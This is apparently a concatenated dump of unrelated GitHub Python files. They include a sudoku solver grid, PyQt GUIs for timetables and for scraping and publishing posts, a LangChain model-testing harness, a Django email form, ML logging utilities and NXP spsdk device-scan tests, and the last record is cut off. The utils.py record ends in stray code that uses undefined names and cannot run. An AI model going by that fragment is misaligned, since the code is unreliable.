\"\"\"\n self.protocol.add_instrument('A', 'p200')\n self.protocol.add_container('C1', 'tiprack.p200')\n self.protocol.add_container('A1', 'microplate.96')\n self.protocol.calibrate('A1', x=1, y=2, z=3)\n self.protocol.calibrate_instrument('A', top=0, blowout=10)\n self.protocol.transfer('A1:A1', 'A1:A2', ul=100)\n self.protocol.transfer('A1:A2', 'A1:A3', ul=80)\n self.protocol.run_all()\n self.protocol.run_all()\n","repo_name":"Yuffster/opentrons_sdk","sub_path":"tests/opentrons_sdk/protocol/test_protocol.py","file_name":"test_protocol.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"37176906970","text":"from logic.Cell import Cell\n\nimport math\n\n\nclass Grid:\n def __init__(self, grid_size):\n # Initialize empty sudoku 9x9 grid\n self.grid_size = grid_size\n self.cell_cnt = grid_size ** 2\n self.fixed_cell_cnt = 0\n self.failed_cell_cnt = 0\n self.grid = [[Cell(self.grid_size) for _ in range(self.grid_size)] for _ in range(self.grid_size)]\n\n def get_cell(self, pos):\n return self.grid[pos[0]][pos[1]]\n\n def set_cell_val(self, pos, val):\n cell = self.get_cell(pos)\n\n if not cell.failed():\n if not cell.fixed():\n self.fixed_cell_cnt += 1\n\n cell.set_val(val)\n\n def all_cells_fixed(self):\n return self.fixed_cell_cnt == self.cell_cnt\n\n def not_solvable(self):\n return self.failed_cell_cnt > 0\n\n def propagate_constraints_row(self, pos):\n cell_to_reduce = self.get_cell(pos)\n\n for col in range(self.grid_size):\n if cell_to_reduce.failed():\n return\n\n if col is not pos[1]:\n cell_coo = (pos[0], col)\n cell = self.get_cell(cell_coo)\n\n if not cell.failed():\n if cell.fixed():\n cell.delete(cell_to_reduce.get_val())\n\n if cell.failed():\n self.failed_cell_cnt += 1\n self.fixed_cell_cnt -= 1\n\n else:\n cell.delete(cell_to_reduce.get_val())\n\n if cell.fixed():\n self.fixed_cell_cnt += 1\n self.propagate_constraints_cell(cell_coo)\n\n def propagate_constraints_col(self, pos):\n cell_to_reduce = self.get_cell(pos)\n\n for row in range(self.grid_size):\n if cell_to_reduce.failed():\n return\n\n if row is not pos[0]:\n cell_coo = (row, pos[1])\n cell = self.get_cell(cell_coo)\n\n if not cell.failed():\n if cell.fixed():\n cell.delete(cell_to_reduce.get_val())\n\n if cell.failed():\n self.failed_cell_cnt += 1\n self.fixed_cell_cnt -= 1\n\n else:\n cell.delete(cell_to_reduce.get_val())\n\n if cell.fixed():\n self.fixed_cell_cnt += 1\n self.propagate_constraints_cell(cell_coo)\n\n def propagate_constraints_square(self, pos):\n cell_to_reduce = self.get_cell(pos)\n\n square_size = int(math.sqrt(self.grid_size))\n square_start_row = pos[0] // square_size * square_size\n square_start_col = pos[1] // square_size * square_size\n\n for row in range(square_start_row, square_start_row + square_size):\n for col in range(square_start_col, square_start_col + square_size):\n if cell_to_reduce.failed():\n return\n\n if row != pos[0] or col != pos[1]:\n cell_coo = (row, col)\n cell = self.get_cell(cell_coo)\n\n if not cell.failed():\n if cell.fixed():\n cell.delete(cell_to_reduce.get_val())\n\n if cell.failed():\n self.failed_cell_cnt += 1\n self.fixed_cell_cnt -= 1\n\n else:\n cell.delete(cell_to_reduce.get_val())\n\n if cell.fixed():\n self.fixed_cell_cnt += 1\n self.propagate_constraints_cell(cell_coo)\n\n # Propagate constraints after setting cell\n def propagate_constraints_cell(self, pos):\n self.propagate_constraints_row(pos)\n self.propagate_constraints_col(pos)\n 
self.propagate_constraints_square(pos)\n\n def propagate_constraints_all_cells(self):\n for row in range(self.grid_size):\n for col in range(self.grid_size):\n cell = self.get_cell((row, col))\n\n if cell.fixed() and not cell.failed():\n self.propagate_constraints_cell((row, col))\n\n def deduce_val_row(self, pos, val):\n for col in range(self.grid_size):\n if col != pos[1]:\n cell = self.get_cell((pos[0], col))\n\n if cell.can_contain(val):\n return False\n\n return True\n\n def deduce_val_col(self, pos, val):\n for row in range(self.grid_size):\n if row != pos[0]:\n cell = self.get_cell((row, pos[1]))\n\n if cell.can_contain(val):\n return False\n\n return True\n\n def deduce_val_square(self, pos, val):\n square_size = int(math.sqrt(self.grid_size))\n square_start_row = pos[0] // square_size * square_size\n square_start_col = pos[1] // square_size * square_size\n\n for row in range(square_start_row, square_start_row + square_size):\n for col in range(square_start_col, square_start_col + square_size):\n if row != pos[0] or col != pos[1]:\n cell = self.get_cell((row, col))\n\n if cell.can_contain(val):\n return False\n\n return True\n\n def deduce_val_cell(self, pos):\n cell = self.get_cell(pos)\n\n for val in cell.possible_vals:\n if self.deduce_val_row(pos, val) or self.deduce_val_col(pos, val) or self.deduce_val_square(pos, val):\n self.set_cell_val(pos, val)\n self.propagate_constraints_cell(pos)\n return\n\n def deduce_vals_all_cells(self):\n for row in range(self.grid_size):\n for col in range(self.grid_size):\n cell = self.get_cell((row, col))\n\n if not cell.fixed() and not cell.failed():\n self.deduce_val_cell((row, col))\n\n # Read sudoku grid\n def read_grid(self, sudoku_file):\n input_grid = open(sudoku_file, \"r\")\n\n for row, vals in enumerate(input_grid.readlines()):\n if len(vals) - 1 != self.grid_size:\n input_grid.close()\n return False\n\n for col in range(self.grid_size):\n val = vals[col]\n\n # Not valid sudoku value\n if not (vals[col] == '-' or (val.isdigit() and 1 <= int(val) <= self.grid_size)):\n input_grid.close()\n return False\n\n if val != '-':\n self.set_cell_val((row, col), int(val))\n\n input_grid.close()\n return True\n\n def print(self):\n for row in range(self.grid_size):\n if row % math.sqrt(self.grid_size) == 0:\n print(\"-------------------------\")\n\n for col in range(self.grid_size):\n if col % math.sqrt(self.grid_size) == 0:\n print(\"|\", end=\" \")\n\n val = self.grid[row][col]\n\n if val.fixed():\n print(val.get_val(), end=\" \")\n else:\n print(\"-\", end=\" \")\n\n print(\"|\")\n\n print(\"-------------------------\")\n\n def is_valid(self):\n self.propagate_constraints_all_cells()\n\n for row in range(self.grid_size):\n for col in range(self.grid_size):\n cell = self.get_cell((row, col))\n\n if not cell.fixed():\n return False\n\n return True\n","repo_name":"klesnkri/sudoku-solver-aco","sub_path":"sudoku/src/logic/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"44894151038","text":"import timetable_parser as tp\nimport sys\nimport datetime\nimport threading\nimport os\nimport configparser\n\n# from PyQt5 import QtGui, QtCore, QtWidgets\n# import qt5_layout as qt_layout\n\nfrom PyQt4 import QtGui, QtCore\nfrom PyQt4 import QtGui as QtWidgets\nimport qt_layout\n\ndef resource_path(relative_path):\n try:\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath('.')\n return 
os.path.join(base_path, relative_path)\n\nwith open(resource_path(\"style.qss\"), 'r') as f:\n style = f.read()\n\n\nclass TimetableApp(QtWidgets.QMainWindow, qt_layout.Ui_MainWindow):\n def __init__(self, parent=None):\n super(TimetableApp, self).__init__(parent)\n self.setupUi(self)\n self.date_edit_list = [self.term_start_edit, self.half_end_edit, self.half_start_edit, self.term_end_edit]\n for index in range(len(self.date_edit_list)):\n date_edit = self.date_edit_list[index]\n date_edit.setDate(QtCore.QDate.currentDate())\n date_edit.calendarWidget().setFirstDayOfWeek(1)\n date_edit.dateChanged.connect(self.lambdaGen(index))\n cal = QStyledCalendar()\n cal.setMinimumHeight(200)\n cal.setFirstDayOfWeek(1)\n cal.setDayColor(6, \"gray\")\n cal.setDayColor(7, \"gray\")\n cal.setDirectionIcons(resource_path(\"icons/left-arrow.png\"), resource_path(\"icons/right-arrow.png\"))\n cal.setVerticalHeaderFormat(QtWidgets.QCalendarWidget.NoVerticalHeader)\n date_edit.setCalendarWidget(cal)\n if index > 0:\n date_edit.setMinimumDate(QtCore.QDate.currentDate())\n\n self.xml_choice_button.clicked.connect(self.selectXMLFile)\n self.target_choice_button.clicked.connect(self.selectTarget)\n self.genCalButton.clicked.connect(self.generateCalendars)\n self.dateFileButton.clicked.connect(self.selectDateFile)\n self.quitButton.clicked.connect(self.close)\n self.first_run = True\n\n def updateDates(self, index=0):\n if index < 3:\n self.date_edit_list[index + 1].setMinimumDate(self.date_edit_list[index].date())\n\n def lambdaGen(self, i):\n return lambda: self.updateDates(i)\n\n def selectXMLFile(self):\n self.xml_line_edit.setText(QtWidgets.QFileDialog.getOpenFileName())\n\n def selectTarget(self):\n self.target_line_edit.setText(QtWidgets.QFileDialog.getExistingDirectory())\n\n def selectDateFile(self):\n self.selectDates(QtWidgets.QFileDialog.getOpenFileName())\n\n def selectDates(self, filename):\n if filename and filename[0]:\n config = configparser.ConfigParser()\n config.read(filename)\n choices = config.sections()\n term, ok = QtWidgets.QInputDialog.getItem(self, \"Select Term\", \"Select term: \", choices, 0, False)\n if ok:\n term_choice = config[term]\n self.term_start_edit.setDate(QtCore.QDate.fromString(term_choice[\"term_start\"], \"dd'/'MM'/'yyyy\"))\n self.half_end_edit.setDate(QtCore.QDate.fromString(term_choice[\"half_end\"], \"dd'/'MM'/'yyyy\"))\n self.half_start_edit.setDate(QtCore.QDate.fromString(term_choice[\"half_start\"], \"dd'/'MM'/'yyyy\"))\n self.term_end_edit.setDate(QtCore.QDate.fromString(term_choice[\"term_end\"], \"dd'/'MM'/'yyyy\"))\n\n def generateCalendars(self):\n target = self.target_line_edit.text()\n xml_file = self.xml_line_edit.text()\n term_start = datetime.datetime.combine(self.term_start_edit.date().toPyDate(), datetime.time())\n half_end = datetime.datetime.combine(self.half_end_edit.date().toPyDate(), datetime.time())\n half_start = datetime.datetime.combine(self.half_start_edit.date().toPyDate(), datetime.time())\n term_end = datetime.datetime.combine(self.term_end_edit.date().toPyDate(), datetime.time())\n print(xml_file)\n if not(os.path.isfile(xml_file)):\n self.workLabel.setText(\"XML file not found\")\n elif not(os.path.isdir(target)):\n self.workLabel.setText(\"Target directory not found\")\n else:\n self.workLabel.setText('Working...')\n if self.week_b.isChecked():\n week_start = \"B\"\n else:\n week_start = \"A\"\n dates = tp.timetableDates(term_start=term_start, half_end=half_end, half_start=half_start, term_end=term_end, week_start=week_start)\n 
calGroup = tp.TimeTableGroup(xml_file, dates)\n if not(self.first_run) and self.calThread.running:\n pass\n else:\n self.first_run = False\n self.calThread = calendarThread(calGroup, target, parent=self)\n self.calThread.start()\n\n\nclass calendarThread(threading.Thread):\n def __init__(self, calendarGroup, target, parent=None):\n threading.Thread.__init__(self)\n self.calendarGroup = calendarGroup\n self.target = target\n self.parent = parent\n self.running = True\n\n def run(self):\n try:\n self.calendarGroup.generate_calendars(self.target)\n self.parent.workLabel.setText('Done')\n self.running = False\n except:\n self.parent.workLabel.setText('Error')\n self.running = False\n\nclass QStyledCalendar(QtWidgets.QCalendarWidget):\n def __init__(self, parent=None):\n super(QStyledCalendar, self).__init__(parent)\n\n def setDayColor(self, day, color):\n if type(color) != QtGui.QColor:\n color = QtGui.QColor(color)\n form = self.weekdayTextFormat(day)\n form.setForeground(color)\n self.setWeekdayTextFormat(day, form)\n\n def setDirectionIcons(self, left_icon, right_icon):\n left_button = self.children()[3].children()[0]\n right_button = self.children()[3].children()[1]\n if type(left_icon) != QtGui.QIcon:\n left_icon = QtGui.QIcon(left_icon)\n if type(right_icon) != QtGui.QIcon:\n right_icon = QtGui.QIcon(right_icon)\n left_button.setIcon(left_icon)\n right_button.setIcon(right_icon)\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n app.setStyleSheet(style)\n form = TimetableApp()\n form.show()\n app.exec_()\n","repo_name":"Giannie/Timetable-Parser","sub_path":"timetable_universal.py","file_name":"timetable_universal.py","file_ext":"py","file_size_in_byte":6292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72121451046","text":"import re\nimport os\nfrom langchain.llms import OpenAI, GPT4All\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.chains import LLMChain\nfrom langchain.prompts import PromptTemplate\nfrom langchain.prompts.chat import (\n HumanMessagePromptTemplate,\n ChatPromptTemplate\n)\nimport yaml\n\n\nCHAT_MODELS=[\"gpt-4\", \"gpt-4-0314\", \"gpt-4-32k\", \"gpt-4-32k-0314\", \"gpt-3.5-turbo\", \"gpt-3.5-turbo-0301\"]\nCOMPLETION_MODELS=[\"text-davinci-003\", \"text-davinci-002\", \"text-curie-001\", \"text-babbage-001\", \"text-ada-001\"]\n\ndef _extract_default_output(o):\n return o.strip()\n\ndef _extract_gpt4all_output(output_str):\n answer = \"Answer:\"\n index = output_str.find(answer)\n if index != -1:\n return output_str[index + len(answer):].strip()\n else:\n return \"\"\n\ndef _create_llm_chain(model_name, template, input_variables, temperature, max_tokens):\n extractor = _extract_default_output\n if model_name in CHAT_MODELS:\n llm = ChatOpenAI(model_name=model_name, temperature=temperature, max_tokens=max_tokens)\n prompt_template = ChatPromptTemplate.from_messages([HumanMessagePromptTemplate.from_template(template=template)])\n elif model_name in COMPLETION_MODELS:\n llm = OpenAI(model_name=model_name, temperature=temperature, max_tokens=max_tokens)\n prompt_template = PromptTemplate(template=template, input_variables=input_variables)\n elif os.path.isabs(model_name) or model_name.startswith('./') or model_name.startswith('../'):\n llm = GPT4All(model=model_name, temp=temperature, n_predict=max_tokens)\n # we wrap the original template in a request/response format so\n # - there's a better chance gpt4all does the right thing\n # - we can parse the output after 
response\n    input_template=f'Question: {template}\\nAnswer:'\n    prompt_template = PromptTemplate(template=input_template, input_variables=input_variables)\n    # we need to remove the question/answer template\n    extractor = _extract_gpt4all_output\n  else:\n    raise ValueError(f\"Invalid model_name: {model_name}. Please use a valid OpenAI model or provide a relative/absolute path for a GPT4All model.\")\n\n  return LLMChain(llm=llm, prompt=prompt_template), extractor\n\ndef _compare_output(output, expected_output):\n  if expected_output['type'] == 'regex':\n    pattern = re.compile(expected_output['value'])\n    return pattern.match(output) is not None, None\n  elif expected_output['type'] == 'string':\n    return output == expected_output['value'], None\n  elif expected_output['type'] == 'yaml':\n    try:\n      output_yaml = yaml.safe_load(output)\n      expected_yaml = yaml.safe_load(expected_output['value'])\n      return output_yaml == expected_yaml, None\n    except yaml.YAMLError:\n      return False, None\n  elif expected_output['type'] == 'prompt':\n    model = expected_output['model']\n    llm = OpenAI(model_name=model, temperature=0, max_tokens=1800)\n    out_value = expected_output['value']\n\n    params = { 'input_text': output, 'conditions': out_value['conditions'] }\n    current_file_path = os.path.abspath(__file__)\n    current_dir_path = os.path.dirname(current_file_path)\n\n    with open(os.path.join(current_dir_path, 'templates/conditions_on_text.yml'), 'r') as file:\n      template = file.read()\n\n    if model in CHAT_MODELS:\n      llm = ChatOpenAI(model_name=model, temperature=0, max_tokens=1800)\n      prompt_template = ChatPromptTemplate.from_messages([HumanMessagePromptTemplate.from_template(template=template)])\n    else:\n      llm = OpenAI(model_name=model, temperature=0, max_tokens=1800)\n      prompt_template = PromptTemplate(template=template, input_variables=['input_text', 'conditions'])\n\n    llm_chain = LLMChain(llm=llm, prompt=prompt_template, output_key='validation_result')\n\n    validation_result = llm_chain.predict(**params)\n\n    try:\n      validation_result_yaml = yaml.safe_load(validation_result)\n      overall_pass = validation_result_yaml.get('pass', False)\n      return overall_pass, validation_result_yaml\n    except yaml.YAMLError:\n      return False, None\n  else:\n    return False, None\n\ndef test_models(prompt_data, tests_data):\n  template = prompt_data['template']\n  input_variables = prompt_data['input_variables']\n\n  tests = tests_data['tests']\n  model_names = tests_data['model_names']\n  temperature = tests_data['temperature']\n  max_tokens = tests_data['max_tokens']\n\n  results = {}\n\n  for model_name in model_names:\n    total = 0\n    passes = 0\n    model_results = []\n\n    llm_chain, extractor = _create_llm_chain(model_name, template, input_variables, temperature, max_tokens)\n\n    for item in tests:\n      variables = item['variables']\n      expected_output = item['expected_output']\n\n      result = extractor(llm_chain.predict(**variables))\n\n      comparison_result, extra_data = _compare_output(result, expected_output)\n\n      if comparison_result:\n        passes += 1\n\n      test_result = {\n        'inputs': variables,\n        'output': result,\n        'comparison_result': comparison_result,\n        'extra_data': extra_data\n      }\n      model_results.append(test_result)\n\n      total += 1\n\n    results[model_name] = (model_results, passes, total)\n\n  return results\n","repo_name":"dschenkelman/promptest","sub_path":"promptest/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":5487,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"52"}
{"seq_id":"4844882367","text":"from 
django.core.mail import EmailMessage\nfrom django import forms\n\n\nclass InquiryForm(forms.Form):\n    name = forms.CharField(label='お名前', max_length=50)\n    email = forms.EmailField(label='メールアドレス')\n    title = forms.CharField(label='タイトル', max_length=50)\n    message = forms.CharField(label='メッセージ', widget=forms.Textarea)\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n    \n    def send_email(self):\n        \"\"\"Email sending logic\"\"\"\n\n        # Get the user-submitted values.\n        # self.cleaned_data['<field name>'] returns the user input that passed form validation.\n        name = self.cleaned_data['name']\n        email = self.cleaned_data['email']\n        title = self.cleaned_data['title']\n        message = self.cleaned_data['message']\n\n        # Email parameters\n        subject = f'お問い合わせ {title}'\n        message = (\n            '送信者: {}\\n'.format(name) + \n            'メールアドレス: {}\\n'.format(email) + \n            'メッセージ:\\n{}'.format(message)\n        )\n        from_email = 'yamashi7227.04020105.7227@outlook.jp'\n        to_list = ['yamashi7227.04020105.7227@outlook.jp']\n        cc_list = [email]\n\n        # Send the mail (instantiate an EmailMessage object, then send it)\n        message = EmailMessage(subject=subject, body=message, from_email=from_email, to=to_list, cc=cc_list)\n        message.send()\n","repo_name":"tai72/boatrace_app","sub_path":"daily_result/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"37865458022","text":"from builtins import print\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nimport random\n\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\nmatplotlib.rcParams['font.family'] = 'sans-serif'\nmatplotlib.rcParams['font.sans-serif'] = 'Arial'\n\nimport os\nimport operator\nimport utils\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\n\ndef save_logs(output_directory, hist, y_pred, y_true, duration,\n              lr=True, plot_test_acc=True):\n    hist_df = pd.DataFrame(hist.history)\n    hist_df.to_csv(output_directory + 'history.csv', index=False)\n\n    df_metrics = calculate_metrics(y_true, y_pred, duration)\n    df_metrics.to_csv(output_directory + 'df_metrics.csv', index=False)\n\n    index_best_model = hist_df['loss'].idxmin()\n    row_best_model = hist_df.loc[index_best_model]\n\n    df_best_model = pd.DataFrame(data=np.zeros((1, 6), dtype=np.float), index=[0],\n                                 columns=['best_model_train_loss', 'best_model_val_loss', 'best_model_train_acc',\n                                          'best_model_val_acc', 'best_model_learning_rate', 'best_model_nb_epoch'])\n\n    df_best_model['best_model_train_loss'] = row_best_model['loss']\n    if plot_test_acc:\n        df_best_model['best_model_val_loss'] = row_best_model['val_loss']\n    df_best_model['best_model_train_acc'] = row_best_model['acc']\n    if plot_test_acc:\n        df_best_model['best_model_val_acc'] = row_best_model['val_acc']\n    if lr == True:\n        df_best_model['best_model_learning_rate'] = row_best_model['lr']\n    df_best_model['best_model_nb_epoch'] = index_best_model\n\n    df_best_model.to_csv(output_directory + 'df_best_model.csv', index=False)\n\n    if plot_test_acc:\n        # plot losses\n        plot_epochs_metric(hist, output_directory + 'epochs_loss.png')\n\n    return df_metrics\n\ndef calculate_metrics(y_true, y_pred, duration):\n    res = pd.DataFrame(data=np.zeros((1, 4), dtype=np.float), index=[0],\n                       columns=['precision', 'accuracy', 'recall', 'duration'])\n    res['precision'] = precision_score(y_true, y_pred, average='macro')\n    res['accuracy'] = accuracy_score(y_true, y_pred)\n    res['recall'] = recall_score(y_true, y_pred, average='macro')\n    res['duration'] = 
duration\n return res\n\ndef save_test_duration(file_name, test_duration):\n res = pd.DataFrame(data=np.zeros((1, 1), dtype=np.float), index=[0],\n columns=['test_duration'])\n res['test_duration'] = test_duration\n res.to_csv(file_name, index=False)\n\ndef plot_epochs_metric(hist, file_name, metric='loss'):\n plt.figure()\n plt.plot(hist.history[metric])\n plt.plot(hist.history['val_' + metric])\n plt.title('model ' + metric)\n plt.ylabel(metric, fontsize='large')\n plt.xlabel('epoch', fontsize='large')\n plt.legend(['train', 'val'], loc='upper left')\n plt.savefig(file_name, bbox_inches='tight')\n plt.close()\n\n\n archive_name = ARCHIVE_NAMES[0]\n dataset_name = 'InlineSkate'\n datasets_dict = read_dataset(root_dir, archive_name, dataset_name)\n\n lengths = [2 ** i for i in range(5, 12)]\n\n x_train = datasets_dict[dataset_name][0]\n y_train = datasets_dict[dataset_name][1]\n x_test = datasets_dict[dataset_name][2]\n y_test = datasets_dict[dataset_name][3]\n\n new_archive_name = 'InlineSkateXPs'\n\n for l in lengths:\n new_x_train = resample_dataset(x_train, l)\n new_x_test = resample_dataset(x_test, l)\n new_dataset_name = dataset_name + '-' + str(l)\n new_dataset_dir = root_dir + 'archives/' + new_archive_name + '/' + new_dataset_name + '/'\n create_directory(new_dataset_dir)\n\n np.save(new_dataset_dir + 'x_train.npy', new_x_train)\n np.save(new_dataset_dir + 'y_train.npy', y_train)\n np.save(new_dataset_dir + 'x_test.npy', new_x_test)\n np.save(new_dataset_dir + 'y_test.npy', y_test)","repo_name":"epodium/EEG_age_prediction","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"37539478443","text":"import sys\nfrom PyQt6.QtWidgets import *\nfrom PyQt6.QtCore import pyqtSignal,QThread\nfrom PyQt6 import uic\nfrom DataHandler.dm3DataHandler import dm3DataHandler \n\nfrom AIWorking.zhihuAuto import zhihuPublish\n\n# import os\nimport path\nsrc_folder = path.Path(__file__).abspath()\nsys.path.append(src_folder.parent.parent)\nfrom server.dm3service import dm3service\nfrom datacreep.dm3Creep import creep3dm\n\nfrom UI.imgDialog import imgDialog\nimport datetime\n\n\nclass mainWin(QMainWindow):\n\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n uic.loadUi(\"UI/UI_main.ui\", self) \n self.bn_run.clicked.connect(self.event_bn_creep)\n self.bn_dialog.clicked.connect(self.event_bn_dialog)\n self.bn_publish.clicked.connect(self.event_publish)\n self.bn_selectAll.clicked.connect(self.event_bn_selecteAll)\n\n # b = QPushButton()\n self.bn_publish.setDisabled(True)\n\n # l= QLineEdit()\n deftext = \"大嘴吹-{0}\".format(datetime.datetime.now().strftime(\"%Y%m%d\"))\n self.txt_title.setText(deftext)\n\n self.dm3Service = dm3service()\n self.dm3Handler = dm3DataHandler(self.tPicInfo)\n self.imgDialog = imgDialog()\n\n #全选\n def event_bn_selecteAll(self):\n self.dm3Handler.selectAllRow()\n\n\n #发布\n def event_publish(self):\n \n pd = self.dm3Handler.getPublishData(self.rb_isRandom.isChecked())\n \n pd.title = self.txt_title.text()\n for data in pd.list:\n print(\"titleName:{0},imgUrl:{1}\".format(data.titleName,data.picUrl)) \n \n # 到知乎\n zhihuPublish(pd)\n pass\n \n #抓爬数据\n def event_bn_creep(self):\n\n self.tPicInfo.clearContents()\n url = self.cb_url.currentText()\n\n if(str.strip(url) == \"\"):\n QMessageBox.warning(self,\"Stop\",\"没有设置Url\")\n return\n \n # 获取到URL,开始抓爬数据\n creep = creep3dm()\n creep.setWin(self)\n 
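# Start crawling from the chosen URL; the two numeric arguments appear to be a page range (an assumption: creep3dm's signature is not shown in this file).\n            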
creep.start(url,1,2)\n\n        # The scraped data is now available;\n        # load it into memory and display it.\n        self.dm3Handler.loadData(creep.data)\n        try:\n            # print(\"dataList Count:\",len(self.dm3Handler.data))\n            self.tm = threadMonitor(self.dm3Handler)\n            self.tm.signalworker.connect(self.tm_connect)\n            self.tm.start()\n        except Exception as e:\n            print(\"Thread Error:\",repr(e))\n\n    def tm_connect(self):\n        # self.bn_publish.setDisabled(False)\n        self.event_publish()\n\n\n    def event_bn_dialog(self): \n        self.imgDialog.setMinimumSize(600,500)\n        self.imgDialog.exec()\n        pass\n\n    def showMessageFromOut(self,msg):\n        QMessageBox.information(self,\"Info\",msg)\n\n    \nclass threadMonitor(QThread):\n\n    signalworker = pyqtSignal()\n\n    def __init__(self,handler:dm3DataHandler) -> None:\n        super().__init__()\n        \n        self.handler = handler\n\n    def run(self):\n        runStatus= 0\n        while(runStatus == 0):\n            # print(\"Thread Monitor dataList Count:\",len(self.handler.data))\n            # print(\"Thread downNum:\",self.handler.imgDownNum)\n            if(self.handler.imgDownNum == len(self.handler.data)):\n                runStatus = 1 # all downloads finished\n                break\n            QThread.sleep(2)\n\n        if(runStatus == 1):\n            self.signalworker.emit()\n        \n        self.quit()\n\n\n\nif __name__ == '__main__':\n    # Create the application\n    app = QApplication(sys.argv)\n    w = mainWin()\n    w.show()\n    sys.exit(app.exec())\n","repo_name":"flysnoopy1984/autoPortage","sub_path":"UI/mainWin.py","file_name":"mainWin.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21904749294","text":"import platform\nfrom unittest.mock import MagicMock, patch\n\nimport libusbsio\nimport pytest\nfrom serial import Serial\nfrom serial.tools.list_ports_common import ListPortInfo\n\nimport spsdk.utils.devicedescription as devicedescription\nimport spsdk.utils.nxpdevscan as nds\nfrom spsdk.exceptions import SPSDKError\nfrom spsdk.mboot.exceptions import McuBootConnectionError\n\n\ndef test_usb_device_search():\n    \"\"\"Test that the search method returns all NXP devices based on their VID.\n    Default VIDs so far are 0x1fc9 and 0x15a2.\n    \"\"\"\n    test_vector = [\n        {\n            \"vendor_id\": 0x0001,\n            \"product_id\": 0,\n            \"path\": b\"\",\n            \"manufacturer_string\": \"\",\n            \"product_string\": \"\",\n            \"serial_number\": \"\",\n        },\n        {\n            \"vendor_id\": 0x15,\n            \"product_id\": 0,\n            \"path\": b\"\",\n            \"manufacturer_string\": \"\",\n            \"product_string\": \"\",\n            \"serial_number\": \"\",\n        },\n        {\n            \"vendor_id\": 0x1FC9,\n            \"product_id\": 0,\n            \"path\": b\"\",\n            \"manufacturer_string\": \"\",\n            \"product_string\": \"\",\n            \"serial_number\": \"\",\n        },\n        {\n            \"vendor_id\": 0x15A2,\n            \"product_id\": 0,\n            \"path\": b\"\",\n            \"manufacturer_string\": \"\",\n            \"product_string\": \"\",\n            \"serial_number\": \"\",\n        },\n    ]\n    result = [\n        devicedescription.USBDeviceDescription(0x1FC9, 0, \"\", \"\", \"\", \"\", \"\"),\n        devicedescription.USBDeviceDescription(0x15A2, 0, \"\", \"\", \"\", \"\", \"\"),\n    ]\n\n    with patch(\"libusbsio.LIBUSBSIO.HIDAPI_Enumerate\", MagicMock(return_value=test_vector)):\n        devices = nds.search_nxp_usb_devices()\n\n    assert len(devices) == len(result)\n\n    for dev, res in zip(devices, result):\n        assert str(dev) == str(res)\n\n\ndef test_usb_device_search_extended():\n    \"\"\"Verify the search method returns all NXP devices based on their VID, plus all\n    additional devices.\n    Default VIDs so far are 0x1fc9 and 0x15a2.\n    \"\"\"\n    test_vector = [\n        {\n            \"vendor_id\": 0x1FC9,\n            \"product_id\": 0,\n            \"path\": b\"\",\n            \"manufacturer_string\": \"\",\n            \"product_string\": \"\",\n            \"serial_number\": \"\",\n        },\n        {\n            
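# The 0x0001 and 0x15 entries below carry non-NXP VIDs and must be ignored; 0x0002 only appears in the expected results because it is passed as an extra VID to the search call.\n            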
\"vendor_id\": 0x0001,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n {\n \"vendor_id\": 0x15,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n {\n \"vendor_id\": 0x1FC9,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n {\n \"vendor_id\": 0x0002,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n {\n \"vendor_id\": 0x15A2,\n \"product_id\": 0,\n \"path\": b\"\",\n \"manufacturer_string\": \"\",\n \"product_string\": \"\",\n \"serial_number\": \"\",\n },\n ]\n result = [\n devicedescription.USBDeviceDescription(0x1FC9, 0, \"\", \"\", \"\", \"\", \"\"),\n devicedescription.USBDeviceDescription(0x1FC9, 0, \"\", \"\", \"\", \"\", \"\"),\n devicedescription.USBDeviceDescription(0x0002, 0, \"\", \"\", \"\", \"\", \"\"),\n devicedescription.USBDeviceDescription(0x15A2, 0, \"\", \"\", \"\", \"\", \"\"),\n ]\n with patch(\"libusbsio.LIBUSBSIO.HIDAPI_Enumerate\", MagicMock(return_value=test_vector)):\n devices = nds.search_nxp_usb_devices([0x2])\n\n assert len(devices) == len(result)\n\n for dev, res in zip(devices, result):\n assert str(dev) == str(res)\n\n\n# following mock functions are only for `test_uart_device_search usage`\n\n\ndef mock_mb_scan_uart(port, timeout: int = 0):\n return True if port == \"COM1\" else False\n\n\ndef mock_sdp_read_status(self, *args, **kwargs):\n print(\"inside mock_sdp_read_status\")\n retval = 1 if self._interface.device._device.port == \"COM5\" else None\n return retval\n\n\ndef mock_sdp_uart_init(self, port: str = None, timeout: int = 5000, baudrate: int = 115200):\n self._device = Serial(port=None, timeout=timeout / 1000, baudrate=baudrate)\n self._device.port = port\n self.expect_status = 